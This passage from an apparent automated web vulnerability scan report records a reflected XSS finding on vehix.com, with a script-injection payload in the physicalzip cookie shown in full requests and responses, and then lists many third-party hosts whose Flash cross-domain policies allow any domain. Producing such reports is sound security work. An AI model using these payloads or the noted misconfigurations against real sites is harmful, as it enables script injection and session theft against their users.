Cookie: physicalzip=75201386bc</script><script>alert(1)</script>cd811f435f3; PreviousPostalCode=75201; VXBETA=0; SSLB=1

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Keep-Alive: timeout=5, max=247
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 14:26:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: zip=75201386bc</script><script>alert(1)</script>cd811f435f3; domain=www.vehix.com; expires=Tue, 14-Jun-2011 13:20:14 GMT; path=/
Set-Cookie: market=; domain=www.vehix.com; expires=Sun, 15-May-2011 13:50:14 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.www.vehix.com
Set-Cookie: SSID=BQC9SxsAAAAAAAAO089NxZEICA7Tz00BAAAAAAAAAAAADtPPTQA; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:14 GMT
Set-Cookie: SSSC=86.G5606932118317339077.1|0.0; path=/; domain=.www.vehix.com
Set-Cookie: SSRT=DtPPTQE; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:14 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL06
Set-Cookie: PreviousPostalCode=75201386bc</script><script>alert(1)</script>cd811f435f3; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:14 GMT; path=/
Set-Cookie: anid=0hAsqpRJzAEkAAAANzhjNGY5ODMtOWU5MS00MDRhLWIyMDQtYmFiYzRlY2QxZGQ00; domain=.www.vehix.com; expires=Sun, 24-Jul-2011 00:00:14 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=f3m1d555vw0qylak2bpoj445; path=/; HttpOnly
Set-Cookie: zip=75201386bc</script><script>alert(1)</script>cd811f435f3; domain=.www.vehix.com; expires=Tue, 14-Jun-2011 13:20:14 GMT; path=/
Set-Cookie: market=; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:14 GMT; path=/
Set-Cookie: breadcrumb=Home|/default.aspx?VXSS=1:; path=/
Set-Cookie: sid=f3m1d555vw0qylak2bpoj445; path=/
RTSS: 1
X-Robots-Tag: NOINDEX, NOFOLLOW
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL09
Date: Sun, 15 May 2011 13:20:14 GMT
Content-Length: 161063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- // --><script la
...[SNIP]...
<script type="text/javascript">

s.pageName='Home';
s.server='PROD-WEB-BL06';
s.channel='Home';
s.prop9='Logged Out';
s.prop24='Vehix';
s.events='event20';
s.eVar7='75201386bc</script><script>alert(1)</script>cd811f435f3';
s.eVar22='Home';
s.eVar27='Vehix';
</script>
...[SNIP]...

3.191. http://www.vehix.com/default.aspx [physicalzip cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vehix.com
Path:   /default.aspx

Issue detail

The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62653</script><script>alert(1)</script>c7e77554239 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.aspx?VXSS=1 HTTP/1.1
Host: www.vehix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: physicalzip=7520162653</script><script>alert(1)</script>c7e77554239; PreviousPostalCode=75201; VXBETA=0; SSLB=1

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Keep-Alive: timeout=5, max=222
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 14:26:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: zip=7520162653</script><script>alert(1)</script>c7e77554239; domain=www.vehix.com; expires=Tue, 14-Jun-2011 13:20:54 GMT; path=/
Set-Cookie: market=; domain=www.vehix.com; expires=Sun, 15-May-2011 13:50:54 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.www.vehix.com
Set-Cookie: SSID=BQB3uRsAAAAAAAA3089NgzgCCDfTz00BAAAAAAAAAAAAN9PPTQA; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:55 GMT
Set-Cookie: SSSC=86.G5606932294410582147.1|0.0; path=/; domain=.www.vehix.com
Set-Cookie: SSRT=N9PPTQE; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:55 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL06
Set-Cookie: PreviousPostalCode=7520162653</script><script>alert(1)</script>c7e77554239; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:55 GMT; path=/
Set-Cookie: anid=3_hkwpRJzAEkAAAAYjI2M2EzMTMtNjI5OS00MzkzLTlmMTMtYzI5ZWMzMGU1ODJk0; domain=.www.vehix.com; expires=Sun, 24-Jul-2011 00:00:55 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2t0kx2ir21freh55ksgbcu55; path=/; HttpOnly
Set-Cookie: zip=7520162653</script><script>alert(1)</script>c7e77554239; domain=.www.vehix.com; expires=Tue, 14-Jun-2011 13:20:55 GMT; path=/
Set-Cookie: market=; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:55 GMT; path=/
Set-Cookie: breadcrumb=Home|/default.aspx?VXSS=1:; path=/
Set-Cookie: sid=2t0kx2ir21freh55ksgbcu55; path=/
RTSS: 1
X-Robots-Tag: NOINDEX, NOFOLLOW
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL09
Date: Sun, 15 May 2011 13:20:54 GMT
Content-Length: 161063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- // --><script la
...[SNIP]...
<script type="text/javascript">

s.pageName='Home';
s.server='PROD-WEB-BL06';
s.channel='Home';
s.prop9='Logged Out';
s.prop24='Vehix';
s.events='event20';
s.eVar7='7520162653</script><script>alert(1)</script>c7e77554239';
s.eVar22='Home';
s.eVar27='Vehix';
</script>
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 39 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 15 May 2011 13:16:52 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 62063

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.3. http://c.gelifesciences.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.gelifesciences.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.gelifesciences.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:55 GMT
Server: Omniture DC/2.0.0
xserver: www64
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.4. http://cfe713.r.axf8.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cfe713.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cfe713.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 13:16:22 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.5. http://d.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 15 May 2011 14:07:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.6. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:58:44 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "4c3a05-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.7. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 38213
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://h41174.www4.hp.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h41174.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41174.www4.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "66b4b7-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_I41174-IQ_qppm_iuuq=ffffffff0909d79c45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.9. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 13:18:32 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://iinet.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iinet.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: iinet.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:32 GMT
Server: Omniture DC/2.0.0
xserver: www297
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://j2global.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: j2global.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:31 GMT
Server: Omniture DC/2.0.0
xserver: www63
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.12. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 15 May 2011 13:19:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.13. http://media.extole.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.extole.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.extole.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Cache-Control: max-age
Content-Type: text/xml
Date: Sun, 15 May 2011 13:24:35 GMT
Expires: Sun, 22 May 2011 13:24:35 GMT
Last-Modified: Tue, 15 Feb 2011 18:44:08 GMT
Server: nginx/0.7.65
Content-Length: 134
Connection: Close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

4.14. http://met1.hp.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:02 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.15. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 15 May 2011 13:16:31 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.16. http://onebox.extole.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onebox.extole.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: onebox.extole.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 15 May 2011 13:24:17 GMT
Last-Modified: Mon, 02 May 2011 03:48:32 GMT
Server: nginx/0.7.65
X-Bicyclette-Version: 4eccbe41b71d565e704d3bb4e3fb92e57ac165b5
Content-Length: 131
Connection: Close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

4.17. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.18. http://pro.hit.gemius.pl/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pro.hit.gemius.pl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pro.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:48 GMT
Expires: Mon, 16 May 2011 01:17:48 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Wed, 11 May 2011 05:38:02 GMT
Set-Cookie: Gtestss=IKdPwnGttTsfCO5pQczC5vl7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxTfBsGvGQpGY98SmGc8SpGLlG5nFwP7d6wHsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://hit.gemius.pl -->
<cross-domain-policy>
   <allow-access-from domain="*" />
...[SNIP]...

4.19. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 15 May 2011 13:17:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 15 May 2011 13:17:05 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.20. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 15 May 2011 13:16:29 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.21. http://upc.d2.sc.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://upc.d2.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: upc.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:44 GMT
Server: Omniture DC/2.0.0
xserver: www26
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.22. http://www.burstnet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
Last-Modified: Wed, 11 May 2011 17:56:33 GMT
ETag: "110080-66-4dcacdd1"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Sun, 15 May 2011 13:18:52 GMT
Connection: close
Set-Cookie: 56Q8=CT; expires=Sun, 12-Jun-2011 13:18:52 GMT; path=/; domain=.www.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.23. http://www.odesk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.odesk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.odesk.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 13:56:37 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Thu, 12 May 2011 00:05:13 GMT
ETag: "c4-4a308f176c040"
Accept-Ranges: bytes
Content-Length: 196
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.24. http://a.ligatus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.ligatus.com

Response

HTTP/1.1 200 OK
